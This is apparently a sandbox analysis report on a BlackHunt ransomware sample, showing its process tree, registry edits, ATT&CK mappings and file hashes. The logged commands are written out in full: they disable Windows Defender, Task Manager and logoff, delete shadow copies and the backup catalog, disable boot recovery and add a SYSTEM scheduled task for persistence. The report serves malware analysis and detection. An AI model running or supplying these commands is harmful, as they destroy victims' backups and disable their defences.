0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 48 PID 2360 wrote to memory of 1972 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 48 PID 2360 wrote to memory of 1972 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 48 PID 2360 wrote to memory of 1972 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 48 PID 2360 wrote to memory of 2844 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 50 PID 2360 wrote to memory of 2844 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 50 PID 2360 wrote to memory of 2844 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 50 PID 2360 wrote to memory of 2844 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 50 PID 2360 wrote to memory of 2632 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 52 PID 2360 wrote to memory of 2632 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 52 PID 2360 wrote to memory of 2632 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 52 PID 2360 wrote to memory of 2632 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 52 PID 2360 wrote to memory of 2644 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 54 PID 2360 wrote to memory of 2644 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 54 PID 2360 wrote to memory of 2644 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 54 PID 2360 wrote to memory of 2644 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 54 PID 2360 wrote to memory of 2600 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 56 PID 2360 wrote to memory of 2600 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 56 PID 2360 wrote to memory of 2600 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 56 PID 2360 wrote to memory of 2600 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 56 PID 2360 wrote to memory of 2664 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe"C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2360 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2316
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1160
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1272
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1520
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe" /F2⤵PID:1660
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe" /F3⤵
- Creates scheduled task(s)
PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:588
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2812
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1652
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1764
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2188
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:856
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1860
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2292
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:332
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1788
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2912
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2312
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2916
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a5fafb1a377a6b6d6179f90bb74704f9
SHA120ead481826a4447d6744dc3911a951af6ce6fb9
SHA256f45cc74c8a2c561707aa6506395aec08f97668040081acf0fa50fcf7bd6c21c8
SHA512e3baa14a20944eaf062f4487da6459357fbc1c71604eadf0057bf4fe4b91ed841b168a39e9b6633ebe75d3a26ad8958f936929d3cbc553c3d33dcea7fee73d99
-
Filesize
684B
MD53b08ee91f8effa148f10983806de4fdc
SHA174e0156e304e4cdfa4bd9aa240824844e2c54cec
SHA256029706908600a5679d075941c0ab5534f4eb4a2eadc81ad3edc7a7ffc37a3220
SHA51221818839364c2351fa7dad4405fae044d92e3304a8d5d4b13790bde4f3426da5ea8a733a200c02774d1b1a88002103534ad5ec28dc18a53298ec4034ed4cf90d
-
Filesize
12KB
MD51f288cab0f94ca50e8b2b6c2d7c797eb
SHA13877e598d1b0d1948cd767ae1795dbc30ad154f6
SHA25661ece0ac88c803be3b62d3a731a0bf2ff2b679203c91414ba1a24444cb6cd363
SHA512cfb48f5e4216ecbe602ccf857459e5a266b74529f06b87f4758784dcfb6fdf389bd7db8f30066723c136bf0a42e43a3a5c227b905444600bac4ea19bb9d73940